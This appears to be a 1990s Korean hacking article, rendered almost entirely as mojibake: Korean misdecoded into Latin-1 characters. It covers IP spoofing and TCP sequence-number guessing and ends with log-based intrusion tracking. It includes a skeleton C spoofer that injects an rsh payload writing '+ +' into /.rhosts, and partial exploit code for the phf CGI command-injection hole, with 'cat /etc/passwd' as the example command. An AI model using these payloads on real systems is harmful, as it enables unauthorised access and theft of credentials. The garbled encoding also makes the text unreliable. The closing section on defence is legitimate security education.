±×°ÍÀÇ ±¸ÇöÀº ¾Ïȣȭ¸¦ ÀÌ¿ëÇϰųª (secure shell, kerberos) Æнº¿öµå¸¦ ´ë½ÅÇÏ´Â ÅäÅ«À» ÀÌ¿ë(S/key)ÇÏ´Â °ÍÀ» ¿¹·Î µé ¼ö ÀÖ´Ù. ±×·± ºÎ·ùÀÇ ¼ÒÇÁÆ®¿þ¾îµéÀº »ó ´ç¼ö°¡ Á¦ÀÛµÅÀִµ¥ ±×Áß °ø°³ ¼ÒÇÁÆ®¿þ¾îÀÎ ssh(Secure Shell: http://www.cs.hut.fi/ssh)ÀÌ »ç¿ëÇϱ⿡ °¡Àå ¹«³­ÇÏ´Ù . ÀÌ°ÍÀº ÆÐŶÀ» ¾ÏȣȭÇØ sshd(¼­¹ö)¿¡°Ô º¸³»´Â ssh,scp(Ŭ¶óÀ̾ðÆ®)°¡ telnet, rlogin, ftp¸¦ ´ë½ÅÇÏ´Â ÆÐÅ°ÁöÀÌ´Ù. ÀÌÁ¦ Á»´õ °í¼öÁØÀÇ ÇØÅ· ¹æ¹ýÁßÀÇ ÇϳªÀÎ spoofing¿¡ ´ëÇؼ­ ¾Ë¾Æº¸µµ·Ï ÇÏÀÚ. IP ½ºÇªÇÎÀ̶õ? spoof¶õ ´Ü¾î´Â '¼ÓÀÌ´Ù, »ç±âÄ¡´Ù'´Â ¶æÀÌ´Ù. Áï ½±°Ô ¼³¸íÇϸé ÇØÄ¿°¡ ¸Ó¹°·¯ÀÖ´Â, ¶Ç´Â ´Ü¼øÈ÷ ¾Ç¿ëÇÏ°íÀÚ Çϴ ȣ½ºÆ®ÀÇ IP ¾îµå·¹½º¸¦ ¹Ù²Ù¾î¼­ À̸¦ ÅëÇØ ÇØÅ·À» ÇÏ´Â °ÍÀÌ´Ù. °¡·É A¶õ È£½ºÆ®¿Í B¶õ È£½ºÆ®°¡ Çϵåµð½ºÅ©¸¦ °øÀ¯ÇÏ°í Àִµ¥ A ¶õ È£½º Æ®¿Í B¶õ È£½ºÆ®´Â º¸¾ÈÀÌ Àß µÇ¾î¼­ ÇØÅ·ÇϱⰡ º¸Åë ¾î·Á¿î °ÍÀÌ ¾Æ´Ï¶ó°í ÇÏÀÚ. ÇÏÁö¸¸ ¾î¶»°Ô¼­µçÁö B¶õ È£½ºÆ®¾È¿¡ ÀÖ´Â ÀÏ±Þ ±Øºñ ¹®¼­¸¦ ÈÉÃÄ¿À°í ½Í´Ù¸é ¾î¶»°Ô ÇØ¾ß ÇÒ±î? ±×·¸´Ù¸é ÇØÄ¿ÀÇ ÃÖ¼±ÀÇ ¼± Åà ¹æ¹ýÀº ´ÙÀ½°ú °°´Ù. ¿ì¼± ÀÚ½ÅÀÌ ¸Ó¹°·¯ Àִ ȣ½ºÆ®ÀÇ IP ¾îµå·¹½º¸¦ BÀÇ ¾îµå·¹½º·Î À§ÀåÀ» ÇÑ´Ù. À§ÀåÀ» Çϸé B ÀÇ È£½º Æ®ÀÇ È­¸é¿¡´Â duplicated IP address ¶ó´Â ¹®ÀåÀÌ ÂïÈ÷°Ô µÇ°í BÈ£½ºÆ®´Â ³×Æ®¿öÅ© ±â´ÉÀ» Àá½Ã »ó½ÇÇÏ°Ô µÈ´Ù. À̶§¸¦ ³õÄ¡Áö ¾Ê°í ÇØÄ¿ÀÇ È£½ºÆ®´Â A È£½ºÆ®¿¡°Ô ÀÚ½ÅÀÌ ÁøÂ¥ BÈ£½ºÆ®¶ó´Â Á¤º¸¸¦ º¸³»¾î AÈ£½ºÆ®¿Í °°ÀÌ ÇÏµå µð½ºÅ©¸¦ °øÀ¯ Çϵµ·Ï ½ÃµµÇÑ´Ù. ¼º°øÇÏ°Ô µÇ¸é ÇØÄ¿´Â AÈ£½ºÆ®ÀÇ Çϵåµð½ºÅ©¿¡ ÀÖ´Â ±Øºñ ¹®¼­¸¦ AÈ£½ºÆ®³ª BÈ£½ºÆ®¿¡ ÀâÀÔÇÏÁö ¾Ê°íµµ ¾ò¾î³¾ ¼ö ÀÖ°Ô µÈ´Ù. ¶ÇÇÑ IP ½ºÇªÇΰú Ç×»ó ¿¬µ¿µÅ »ç¿ëµÇ´Â °ø°Ý¹ýÀ¸·Î TCP sequence number guessing attackÀ» µé ¼ö ÀÖ´Ù. ÀÌ¿¡ ´ëÇؼ­µµ Àá½Ã ¼³¸íÇغ¼±î ÇÑ´Ù. TCP Sequence Number Guessing AttackÀ̶õ? °ú°Å¿¡ Internet wormÀÇ ÀúÀڷεµ À¯¸íÇß´ø Robert T.Morris°¡ º§ ¿¬±¸¼Ò¿¡¼­ ÀÎÅϽ±À¸·Î ÀÏÇÒ ¶§ ½è´ø ³í¹®¿¡¼­ óÀ½À¸·Î ¾Ë·Á Á³°í AT&T»çÀÇ Bellovin S.MÀÌ 89³â¿¡ ¾´ ³í¹®¿¡¼­µµ ¾ð±ÞÀÌ µÇ¾ú´ø °ø°Ý ¹æ¹ýÀÌ´Ù(Security Problems in the TCP/IP Protoc ol Suite). Äɺó ¹ÌÆ®´ÐÀÌ »ç¿ëÇÑ ¹æ¹ý ¶ÇÇÑ, ÀÌ·± °ø°ÝÀ» ÀÌ¿ëÇØ À۳⵵¿¡ ½ÃÅ¥¸®Æ¼°è¸¦ ¶°µé¼®ÇÏ°Ô Çß¾ú´ø »ç°ÇÀÌ Çϳª ÀÖ´Ù. ¹Ù·Î Äɺó ¹ÌÆ®´ÐÀÌ ½Ã¸ð¹«¶ó ¾²Å乫( ½´ÆÛÄÄÇ»ÅÍ ¼¾ÅÍ ¼Ò¼Ó ¿¬±¸¿ø)ÀÇ ÄÄÇ»Å͸¦ °ø°ÝÇØ ÀڷḦ »©°£ µÚ °ü¸®ÀÚÀÎ ½Ã¸ð¹«¶ó ¾²Å乫¸¦ Á¶·ÕÇÏ°í ´Þ¾Æ³­ »ç°ÇÀÌ´Ù. Äɺó ¹ÌÆ®´ÐÀº »ó´ç±â°£ µ¿¾È ÀâÈ÷Áö ¾Ê´Ù°¡ ½Ã¸ð¹«¶ó ¾²ÅäÄíÀÇ ´«¹°°Ü¿î ÃßÀû³¡¿¡ °£½ÅÈ÷ ÀâÈù °ÍÀ¸·Î ÀÌ »ç°ÇÀº °á¸»³ª°Ô µÇ¾ú´Ù. Äɺó ¹ÌÆ®´ÐÀÌ Ã¼Æ÷µÇ¾î ÀâÇô°¡¸é¼­ ½Ã¸ð¹«¶ó¿¡°Ô "´ç½ÅÀÇ ½Ç·ÂÀº Á¤¸» ³î¶ó¿Ô¼Ò." ¶ó°í ¸»ÇØ ´õ À¯¸íÇØÁø »ç°ÇÀ̱⵵ ÇÏ´Ù. ¹Ù·Î ÀÌ »ç°Ç¿¡¼­ Äɺó ¹ÌÆ®´ÐÀÌ ¾´ ¹æ¹ýµµ TCP Sequence Number guessing attackÀÇ Æ¯º°ÇÑ ÇÑ ÇüŶó°í ÇÒ ¼ö ÀÖ´Ù . (¹ÌÆ®´ÐÀÌ »ç¿ëÇÑ ¹æ¹ýÀº IP ¾îµå·¹½º¸¦ spoofÇؼ­ Berkerly R-command(rlogin, rcp , rsh µîµî)¸¦ °ø°ÝÇÑ ¹æ¹ýÀ̾ú´Ù.) ÀÚ ÀÌÁ¦, IP Spoofing°ú TCP Sequence number guessing attackÀ» ÀÚ¼¼È÷ ¾Ë¾Æº¸ÀÚ. °£´ÜÈ÷ A¿Í B¶ó´Â È£½ºÆ®°¡ ¼­·Î¸¦ trustÇÏ °í ÀÖ´Ù°í °¡Á¤ÇÏÀÚ. ÀÚ½ÅÀÇ PCÀÇ IP ¾îµå·¹½º¸¦ B¶ó´Â È£½ºÆ®·Î ¹Ù²Ù°í A¿¡°Ô Á¢±ÙÇÏ¸é °¡´É¼ºÀÌ ÀÖÁö ¾Ê°Ú´À³Ä¶ó°í Àǹ®À» Á¦ ±âÇÏ´Â ºÐÀÌ °è½ÇÁöµµ ¸ð¸£°ÚÀ¸³ª ÀÚ½ÅÀÇ À§Ä¡°¡ B¶ó´Â È£½ºÆ®°¡ À§Ä¡ÇÑ °÷º¸´Ù Aº¸´Ù ÈξÀ ´õ ½Ã°£ÀûÀ¸·Î À¯¸®ÇÑ À§Ä¡, Áï LAN ¿¡¼­³ª °¡´ÉÇÒ ¹ýÇÑ À̾߱â´Ù. ±×¿ÜÀÇ °æ¿ì¿¡´Â °ÅÀÇ ¼Ò¿ëÀÌ ¾ø´Ù°í º¸¾Æµµ ¹«¹æÇÏ´Ù.. ÀÚ½ÅÀÇ IP ¾îµå·¹½º¸¦ º¯Á¶Çصµ B¶ó´Â trusted host°¡ A¿¡°Ô·Î µµ´ÞÇÏ´Â °Å¸®°¡ ¸Ö»Ó¸¸ ¾Æ´Ï¶ó. ÀÚ½ÅÀÇ ¼­ºê³Ý¿¡¼­ ´Ù¸¥ IP ¾î µå·¹½º¸¦ °¡Áø ÆÐŶÀ» ³¯¸°´Ù´Â °ÍÀº ¶ó¿ìÆûóÀÇ ¹®Á¦¸¦ ºñ·ÔÇØ °®°¡Áö ¹®Á¦Á¡ÀÌ Á¦±âµÈ´Ù. ±×·³ Äɺó ¹ÌÆ®´ÐÀÌ Berkeley R-commands¸¦ °ø°ÝÇÏ´Â °æ¿ì¸¦ ¿¹·Î µé¾î¼­ IP spoofing ÀÌ ¾î¶»°Ô ÀÛ¿ëÇϳª¿¡ ´ëÇؼ­ ¾Ë¾Æº¸±â ·Î ÇÏÀÚ. ¿¹¸¦ µé¾î ÇØÄ¿ÀÇ È£½ºÆ®¸¦ evil.comÀ̶ó ÇÏ°í target.comÀ» °ø°ÝÇϱâ À§Çؼ­ target.com°ú good.com°£ÀÇ trusting Re lationshipÀ» ÀÌ¿ëÇÏ°íÀÚ ÇÑ´Ù. Áï , target.com # cat /.rhosts good.com root target.com # °£´ÜÈ÷ evil.comÀÇ IP ¾îµå·¹½º¸¦ good.comÀÇ IP ¾îµå·¹½º·Î ¹Ù²Û ´ÙÀ½¿¡target.comÀÇ rsh server¿¡ Á¢¼ÓÇÏ·Á°í ½ÃµµÇß´Ù ÇÏÀÚ. ÀÌ °æ¿ì¿¡´Â TCP°¡ °®°í ÀÖ´Â Initial 3-way ÇÚµå¼ÎÀÌÅ· ¶§¹®¿¡ Ä¿³Ø¼ÇÀÌ ÀÌ·ïÁöÁö ¾Ê´Â´Ù. TCPÀÇ Initial 3-way ÇÚµå¼ÎÀÌÅ· ÀÇ ¿¹¸¦ ¿ì¼± µé¾îº¸ÀÚ. evil.com# telnet target.com login ÇÒ °æ¿ì evil.com -> target.com SYN 1415531521 // evil.comÀÌ Initial sequence number ¸¦ º¸³½´Ù. target.com -> evil.com ACK 1415531521 SYN 1823083521 // target.comÀÌ evil.comÀÌ º¸³½ ISNÀ» ACKÇÏ°í target.comÀÌ ÀÚ½ÅÀÇ // Initial sequence number ¸¦ º¸³½´Ù. evil.com -> target.com ACK 1823083521 // evil.comÀÌ target.comÀÇ ISNÀ» ACKÇÑ´Ù. À§¿Í °°Àº ÆÐŶÀÌ ±³È¯µÈ´Ù. TCP Çì´õÀÇ SYN Ç÷¡±×´Â 'synchronize sequence numbers'ÀÌ´Ù. SYN Ç÷¡±×´Â TCP Sequence Number ¸¦ µ¿¹ÝÇϴµ¥ ÀÌ ³Ñ¹ö´Â TCP/IP implementation¸¶´Ù »ý¼ºµÇ´Â ¹æ¹ýÀÌ ¾à°£¾¿ ´Ù¸£´Ù. 4.4BSD¿¡¼­´Â OS°¡ ÃʱâÈ­µÉ ¶§ 1·Î Ãʱâ È­µÇ°í ±× ÈÄ´Â 0.5Ãʸ¶´Ù 64,000¾¿ Áõ°¡ÇÑ´Ù. ¶ÇÇÑ »õ·Î¿î TCP Ä¿³Ø¼ÇÀÌ ¸¸µé¾îÁú ¶§¸¶´Ù 64,000¾¿ Áõ°¡ÇÑ´Ù. ´Ü¼øÈ÷ evil.comÀÇ IP ¾îµå·¹½º¸¦ ¹Ù²Ù´Â °Í¸¸À¸·Î´Â target.comÀÌ evil.comÇÑÅ× º¸³»´Â ISNÀ» ¹ÞÀ» ¼ö°¡ ¾ø°í(¿Ö³Ä¸é target.c omÀº good.com¿¡°Ô ISNÀ» º¸³»°ÚÁö¿ä.¶ó¿ìÆÃÀÌ ±×·¸°Ô µÇ¾î ÀÖÀ» Å״ϱî.) µû¶ó¼­ Ä¿³Ø¼ÇÀÌ ¼º¸³µÇÁö ¾Ê´Â´Ù. Ä¿³Ø¼ÇÀÌ establis hµÉ·Á¸é good.comÀÌ target.comÀÌ º¸³»´Â ISNÀÌ º¸³»´Â ÆÐŶ¿¡ ÀÀ´äÀ» ÇÏÁö ¸»¾Æ¾ßÇÒ »Ó¸¸ ¾Æ´Ï¶ó(º¸ÅëÀÇ °æ¿ì good.comÀº ÀÌ ·² °æ¿ì RST(Reset connection) ÆÐŶÀ» º¸³»¼­ ¸ðµç °ÍÀ» ¸ÁÄ£´Ù) target.comÀÌ good.com¿¡°Ô º¸³½ ISNÀ» ÃßÃøÇؼ­ ACKÇØÁà¾ß ÇÑ´Ù. ÀÌ µÎ ½ºÅÜÀÌ ¿Ïº®ÇÏ°Ô µÆÀ» °æ¿ì echo '+ +' > /.rhosts À» ´ãÀº rsh ÆÐŶÀ» º¸³» ¿øÇÏ´Â ¸ñÀûÀ» ÀÌ·ê ¼ö°¡ ÀÖ´Ù. IP spooferÀÇ ´ë·«ÀûÀÎ ÄÚµå hose_conn(trust_host, trust_addr, seq_num, port_num) { ... /* sendtcppacket( struct ether_addr source_hardware addr. struct ehter_addr dest_hardware addr. u_long source ip addr. u_long dest ip addr. u_short source port. u_short dest port. u_long sequence no. u_long acknowledge no. int flags (SYN, RST, ACK, PUSH, FIN) char * data int strlen(data) */ sendtcppacket(&(eh.ether_shost), &(eh.ether_dhost), bad_addr, trust_addr, port_num[i], 513, seq_num, 0, TM_SYN, NULL, 0); ... } det_seq(targ_host, targ_addr, next_seq, offset) { ... / Ä¿³Ø¼ÇÀ» ¿ä±¸ÇÏ´Â ÆÐŶÀÇ Àü¼Û / sendtcppacket(&(eh.ether_shost), &(eh.ether_dhost), my_addr, targ_addr, start_port, 514, start_seq, 0, TM_SYN, NULL, 0); /* readpacket( struct fddi_header fddi_header struct ether_header ether_header struct ip ip_header struct udphdr udp_header struct tcphdr tcp_header char * data int strlen(data) ) */ while(readpacket(NULL, &eh2, &iph, NULL, &tcph, NULL, NULL) != PTYPE_IP_TCP) ; if(ntohs(tcph.th_dport)==start_port && ntohs(tcph.th_sport)==514) { / Æ÷Æ®¹øÈ£°¡ ¸Â´Ù¸é reply ÆÐŶÀ¸·Î °£ÁÖÇÏ°í guessingÀ» ½ÃÀÛÇÑ´Ù / if(prev_seq) diff=tcph.th_seq-prev_seq; else diff=0; if(*offset==0) *offset=diff; prev_seq=tcph.th_seq; sendtcppacket(&(eh.ether_shost), &(eh_ether_dhost), my_addr, targ_addr, start_port++, 514, start_seq++, 0, TM_RST, NULL, 0); ... } spoof_conn(trust_addr, targ_host, targ_addr, next_seq) { char *string="0\0root\0root\0echo + + >>/.rhosts\0"; / SYN ÆÐŶÀ» °íÀ¯ÇÑ ½ÃÄö½º¹øÈ£¿¡ ¸ÂÃç Àü¼Û / sendtcppacket(&(eh.ether_shost), &(eh.ether_dhost), trust_addr, targ_addr, port, 514, seq++, 0, TM_SYN, NULL, 0); usleep(5000); / guessÇÑ ½ÃÄö½º¹øÈ£¿¡ ¸ÂÃç ACK ÆÐŶÀ» Àü¼Û / sendtcppacket(&(eh.ether_shost), &(eh.ether_dhost), trust_addr, targ_addr, port, 514, seq, ++next_seq, TM_ACK, NULL, 0); / rsh request¸¦ ½ÃÄö½º¹øÈ£¿Í ACK¹øÈ£¿¡ ¸ÂÃß¾î Àü¼Û / sendtcppacket(&(eh.ether_shost), &(eh.ether_dhost), trust_addr, targ_addr, port, 514, seq, next_seq, TM_ACK, string, stringlen); seq+=stringlen; / Àü¼ÛÇÑ ÆÐŶÀÌ ACKµÇ¾î 󸮵DZ⸦ ±â´Ù¸°´Ù / sleep(1); / »õ·Î¿î ½ÃÄö½º¹øÈ£¿¡ ¸ÂÃß¾î FINÆÐŶÀ» Àü¼Û / sendtcppacket(&(eh.ether_shost), &(eh.ether_dhost), trust_addr, targ_addr, port, 514, seq, next_seq, TM_FIN, NULL, 0); / RSTÆÐŶ Àü¼Û, Ä¿³Ø¼Ç Æıâ./ sendtcppacket(&(eh.ether_shost), &(eh.ether_dhost), trust_addr, targ_addr, port, 514, seq+4, next_seq+4, TM_RST, NULL, 0); ... } main(argc, argv) { /* initialization of the packet */ init_filter("tcp", NULL); /* trusted hostÀÇ 513¹ø Æ÷Æ®¿¡ ´ëÇØ flooding ½ÃÀÛ */ hose_trusted(argv[1], trust_addr, seq_num, port_num); /* guessing Sequence Number */ det_seq(argv[2], targ_addr, &next_seq, &offset); /* ½ÇÁ¦ spoofingÇÑ Ä¿³Ø¼ÇÀ» ½ÃÀÛ. À̶§¿¡´Â ´ÙÀ½ ½ÃÄö½º¹øÈ£¸¦ ¾Ë°íÀÖ´Ù */ spoof_conn(trust_addr, argv[2], targ_addr, next_seq); /* ¸ðµç Ä¿³Ø¼ÇÀ» reset. */ reset_trusted(argv[1], trust_addr, seq_num, port_num); exit(0); } * IP spoofing ¿¡ ´ëÇؼ­´Â ´ÙÀ½ÀÇ Á¤º¸¸¦ ÂüÁ¶ÇÏÀÚ. ftp://ftp.research.att.com/dist/internet_security Bellovin paper : ipext.ps.Z -> "Security Problems in the TCP/IP Protocol Suite" Morris paper : 117.ps.Z -> "A Weakness in the 4.2BSD Unix TCP/IP Software" CERT_advisory CA-95:01.IP.spoofing ³Ý½ºÄÉÀÌÇÁ¸¦ ÀÌ¿ëÇÑ ÇØÅ· ¸¶Áö¸·À¸·Î ÃÖ±Ù ¸¹Àº Àα⸦ ¾ò°í ÀÖ´Â ³Ý½ºÄÉÀÌÇÁ¸¦ ÀÌ¿ëÇØ ÇØÅ·ÇÏ´Â ±â¹ý¿¡ ´ëÇØ »ìÆ캸ÀÚ. NCSA HTTPD¸¦ ÀÌ¿ëÇÑ ÇØÅ· ÂüÁ¶: CERT Advisory CA-95:04 CIAC Advisory F-11: UNIX NCSA httpd Vulnerability NCSA HTTPD¸¦ µ¹¸®´Â È£½ºÆ®ÀÇ °ü¸®ÀÚµéÀº ¼Ò½º¿¡ CERT Advisory CA-95:04¿¡¼­ Á¦½ÃÇÑ ÆÐÄ¡¸¦ Àû¿ëÇÑ ÈÄ µ¹·ÁÁֱ⠹ٶõ´Ù. httpd ÇÁ·Î¼¼½º°¡ ÀÛµ¿ÇÏ´Â µ¿¾È ¿ÜºÎÀÇ ÇØÄ¿°¡ ¾Æ¹«·± ÀÎÁõÀýÂ÷¾øÀÌ NCSA httpd°¡ ÀÓÀÇÀÇ ¸í·É¾î¸¦ ¼öÇàÇϵµ·Ï ÇÒ ¼ö ÀÖ´Ù. ºñ·Ï machine instruction levelÀ̾ °ø°Ý´çÇϱ⠱׸® ½¬¿î ¹ö±×´Â ¾Æ´ÏÁö¸¸ ÁÖÀÇ°¡ ¿ä±¸µÇ´Â ¹ÙÀÌ´Ù. ÇöÀç NCSA¿¡¼­´Â ÀÌ È¦À» ÆÐÄ¡ÇÑ ¼Ò½º¿Í ¹ÙÀ̳ʸ® ¹öÀü 1.3RÀ» ³»³õ°í ÀÖ´Ù. ¶ÇÇÑ NCSAÀÇ cgi-binÀÇ ¿¹Á¦·Î µû¶ó¿À´Â ÇÁ·Î±×·¥Áß phf¶ó´Â ÇÁ·Î±×·¥ÀÌ ÀÖ´Ù.ÀÌ ÇÁ·Î±×·¥ÀÇ ¹®Á¦´Â popen(3S)ÀÌ »õ·Î¿î ¶óÀÎÀÌ µé¾î¿Ã °æ¿ì »õ·Î¿î command ·Î ÀνÄÇϱ⠶§¹®¿¡ ¹®Á¦°¡ ¹ß»ýÇÑ´Ù. cgi-bin ÇÁ·Î±×·¥ÀÌ popenÀ» »ç¿ëÇÒ °æ¿ì ´ÙÀ½°ú °°Àº ·ùÀÇ ÇÁ·Î±×·¥À» ÀÌ¿ëÇØ ½±°Ô exploitµÉ ¼ö ÀÖ´Ù. ¾Æ·¡ÀÇ ÄÚµå´Â ±âº»Àû À¸·Î NCSA¿¡ µþ·Á¿À´Â /cgi-bin/phf ¸¦ ÀÌ¿ëÇÏ°í ÀÖ´Ù. ¾ð·ÐÀÇ ¼º°Ý»ó ÀüºÎ¸¦ ½ÆÁö´Â ¾Ê°í ÁÖ¿äÇÑ ºÎºÐ¸¸À» ½Æ´Â °ÍÀ» ¾çÇØÇØ Áֱ⠹ٶõ´Ù. /* Usage : get hostname 'command you wanna execute' EX : get targethost 'cat /etc/passwd' */ /* ÁÖ¿ä ÇÔ¼ö ¸î°¡Áö¸¸À» Àû¾ú´Ù. */ int writen( fd , buf, nbytes ) register int fd ; register char *buf ; register int nbytes ; { int nleft , nwritten ; nleft = nbytes ; while( nleft > 0 ) { nwritten = write( fd , buf , nleft ); if( nwritten <= 0 ) return(nwritten); nleft -= nwritten ; buf += nwritten ; } return( nbytes - nleft ); } void make_cmd( char *cmd ,char *cmdinput) { char *tok; char buf[100]; char *before = "GET /cgi-bin/phf?Jserver=life.sucks&Qalias="; char *behind = "&Qname=&Qemail=&nickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip=\ n"; bzero(buf,sizeof(buf)); strcat(buf,"%0A"); tok = strtok(cmdinput," "); strcat(buf,tok); strcat(buf,"%20"); while( (tok=strtok(NULL," ")) != NULL ){ strcat(buf,tok); strcat(buf,"%20"); } strcat(cmd,before); strcat(cmd,buf); strcat(cmd,behind); } ÇØÅ·°èÀÇ Çö½Ç ÇØÅ·Àº ¾È ÁÁÀº ÀνÄÀ̶ó´Â °ÍÀÌ ´ëºÎºÐÀÇ Áß·ÐÀÌ´Ù. ÇÏÁö¸¸ ½Ã½ºÅÛ °ü¸®ÀÚµéÀÇ ´ëºÎºÐÀÇ °æÇèÀ» µé¾îº¸°Å³ª, ±×µéÀÇ ÀÇ°ßÀ» µé ¾îº¸¸é ÇØÅ·Àº ÇÊ¿ä¾ÇÀ̶ó´Â ÀνÄÀ» ¸¹ÀÌ ÇÏ°í ÀÖ´Ù. ¸ÖƼÀ¯ÀúµéÀ» À§ÇÑ ½Ã½ºÅÛÀ̾ º¸¾È»ó ¿Ïº®ÇÒ ¼ö ¾ø´Ù´Â °ÍÀÌ ¼öÇÐÀûÀ¸·Î Áõ¸íµÈ »óÅÂÀ̹ǷÎ, º¸¾È¿¡ ¿Ïº®Àº ±âÇÏÁö ¸øÇÏ´õ¶óµµ ÃÖ¼±À» ±âÇϱâ À§Çؼ­´Â ¾î´À Á¤µµ ÇØÅ·¿¡ ´ëÇÑ Áö½ÄÀÌ ÀÖ¾î¾ß ÇÑ´Ù. ¶ÇÇÑ ½Ã½ºÅÛÀÇ ¹ö±×¸¦ ¹ß°ßÇؼ­ ¹ö±× ¸®Æ÷Æ®¸¦ ¹ßÇ¥ÇÑ ´ë´Ù¼öµéÀº ¸ðµÎ ÇÑ ¶§ ½Ã½ºÅÛ Ä§ÀÔÀڷμ­ÀÇ °æ·ÂÀ» °¡Á³´ø »ç¶÷µéÀÌ ´ë ºÎºÐÀ̶ó´Â °ÍÀÌ À̸¦ ¹ÝÁõÇØÁشٰí ÇÒ ¼ö ÀÖ°Ú´Ù. ÇöÀç Å×Å©´ÐÀÌ ¶Ù¾î³­ ÇØÄ¿µéÀº ´ëÇлýµéÀÌ ´ëºÎºÐÀε¥, À̵éÀº ÀڽŵéÀÇ º¸ ¾È¿¡ ´ëÇÑ Áö½ÄÀ» ÀÎÁ¤ÇØÁÖ¾úÀ¸¸é ÇÏ´Â ¹Ù·¥À» °®°í ÀÖ´Ù. ÇØÄ¿ ÃßÀûÇϱâ(Intrusion detection) ¾ðÁ¦±îÁö ÇØÄ¿¿¡°Ô ´çÇÏ°í¸¸ ÀÖÀ»°ÍÀΰ¡? ÇØÄ¿°¡ µé¾î¿Ô´Ù¸é ÃßÀûÀ» Çؼ­ Àâ¾Æ³»´Â ÀÏ ¶ÇÇÑ Áß¿äÇÏ´Ù°í ÇÒ ¼ö ÀÖ´Ù. ÀÌÁ¦ ÇØÄ¿¸¦ ÃßÀûÇÏ´Â ¹æ¹ý¿¡ ´ëÇØ ¾Ë¾Æº¸±â·Î ÇÏÀÚ. óÀ½ ½Ã½ºÅÛ¿¡ ·Î±×ÀÎÇÏ°Ô µÇ¸é ´ÙÀ½°ú °°Àº ¸Þ½ÃÁö¸¦ º¸³¾ °ÍÀÌ´Ù. login: sakai password: Last login: Fri Mar 3 02:05:42 on console SunOS Release 4.1.3-KLE1.1.3 (BARAM_KOR) #2: Sun Sep 26 10:16:21 KST 1993 You have mail. 1995³â03¿ù03ÀÏ(±Ý) 03½Ã10ºÐ34ÃÊ KST % ¿©±â¿¡ ³ªÅ¸³ª´Â Last loginÀ» È®ÀÎÇÏ°í ÀÚ½ÅÀÌ ·Î±×ÀÎÇÑ ½Ã°£´ë°¡ ¾Æ´Ñ¶§¿¡ ·Î±×ÀÎÀÌ µÆ´Â°¡¸¦ È®ÀÎÇØ º»´Ù. ħÀÔÀÚ°¡ µé¾î¿Â °Í °°Àº ÀǽÉÀÌ µé ¶§ °ü¸®ÀÚ¿¡°Ô ¿¬¶ôÇØ ±× ½Ã°£´ëÀÇ ·Î±×¿Í ÇÁ·Î¼¼½º¸¦ È®ÀÎÇØ ÃßÀûÀ» Çϵµ·Ï ÇÑ´Ù. ȤÀº À§¿Í °°ÀÌ ÀÚ½ÅÀÇ ½Ã ½ºÅÛ ·Î±×ÀÎ ¸Þ½ÃÁö¸¦ È®ÀÎÇÏ´Â ¹æ¹ýµµ ÀÖÁö¸¸, ´Ù¸¥ ¹æ¹ýÀ¸·Î, last¶ó´Â ¸í·ÉÀ» ÀÌ¿ë, ÀÚ½ÅÀÇ ½Ã½ºÅÛ¿¡ ÀÚ½ÅÀÇ À̸§À¸·Î µé¾î¿Â À¯Àú¸¦ ãÀ» ¼öµµ ÀÖ´Ù. ´ÙÀ½Àº lastÀÇ ¿¹ÀÌ´Ù. % last | more ksh ttyqd casaturn.kaist.a Thu Mar 16 16:52 still logged in chkim ttyr9 dal1.kaist.ac.kr Thu Mar 16 16:50 still logged in hjha ttyqd danso.kaist.ac.k Thu Mar 16 16:49 - 16:51 (00:01) hjha ttyra danso.kaist.ac.k Thu Mar 16 16:47 - 16:47 (00:00) solee ttyra dangun.kaist.ac. Thu Mar 16 16:46 - 16:46 (00:00) yjkim ttyr9 gaea.kaist.ac.kr Thu Mar 16 16:44 - 16:50 (00:05) chkim ttyr9 dal1.kaist.ac.kr Thu Mar 16 16:42 - 16:43 (00:01) drunken ttyra chagall.kaist.ac Thu Mar 16 16:40 - 16:40 (00:00) shhong ttyra dbserver.kaist.a Thu Mar 16 16:39 - 16:39 (00:00) jhlee ttyr9 paradise.kaist.a Thu Mar 16 16:38 - 16:39 (00:01) hjha ttyra danso.kaist.ac.k Thu Mar 16 16:36 - 16:37 (00:00) À§ÀÇ ¿¹¿¡¼­, last | grep myloginnameÀ» ÀÔ·ÂÇϸé, ÀÚ½ÅÀÇ ID·Î ¾ðÁ¦ ¾îµð¼­, ´©°¡ ·Î±×ÀÎÇß´ÂÁö¸¦ ¾Ë ¼ö ÀÖ°Ô µÈ´Ù. ¼÷·ÃµÈ ÇØÄ¿´Â À§ÀÇ last Á¤º¸°¡ À¯ÁöµÈ ½Ã½ºÅÛ ÆÄÀÏÀ» Áö¿ì°í °¡Áö¸¸, ¿©±â¼­´Â ºñ¼÷·Ã ÇØÄ¿¸¦ °¡Á¤ÇÏ°í ¸í·ÉÀ» Ãĺ¼ ¼ö ÀÖ´Ù. ¶Ç´Â ¾à °£Àº ¸Õ À̾߱âÀÌÁö¸¸, ÇØÄ¿°¡ µé¾î¿Í¼­ ¾î¶² ÀÏÀ» ÇÏ°í °¬´ÂÁö¸¦ ¾Ë¾Æ³»±â À§Çؼ­´Â lastcommÀ̶ó´Â ¸í·É¾î°¡ ÀÖ´Ù. lastcommÀº Áö±Ý À̽ð£±îÁö ½Ã½ºÅÛ¿¡¼­ ¼öÇàµÇ¾ú´ø ¸í·É¾îµéÀ» º¸¿©ÁÖ°Ô µÈ´Ù. ¸¸¾à¿¡ lastcommÀÌ ÀÛµ¿µÇÁö ¾Ê´Â´Ù¸é ½Ã½ºÅÛ °ü¸®ÀÚ°¡ ´Ù À½ÀÇ ¸í·ÉÀ» ¼öÇàÇϵµ·Ï ÇØ¾ß ÇÑ´Ù. % /usr/etc/accton /usr/adm/acct % lastcomm | more msgs ksh ttyp2 0.03 secs Thu Mar 16 16:58 less ksh ttyp2 0.06 secs Thu Mar 16 16:58 csh F ksh ttyp2 0.00 secs Thu Mar 16 16:58 csh F ksh ttyp2 0.00 secs Thu Mar 16 16:58 date ksh ttyp2 0.02 secs Thu Mar 16 16:58 stty ksh ttyp2 0.02 secs Thu Mar 16 16:58 stty ksh ttyp2 0.02 secs Thu Mar 16 16:58 biff ksh ttyp2 0.02 secs Thu Mar 16 16:58 hostname ksh ttyp2 0.02 secs Thu Mar 16 16:58 whoami ksh ttyp2 0.03 secs Thu Mar 16 16:58 hostname ksh ttyp2 0.02 secs Thu Mar 16 16:58 hostname ksh ttyp2 0.02 secs Thu Mar 16 16:58 hostname ksh ttyp2 0.02 secs Thu Mar 16 16:58 Àü¹®µÈ ÇØÄ¿¿Í À̸¦ ¸·´Â º¸¾ÈÆÀÀº Ç×»ó ¿©·¯°¡Áö ÆÄÀÏÀ» ÀÌ¿ëÇؼ­ º¸¾ÈÀ» üũÇÏ°Ô µÇ¸ç, last, lastcommÀº 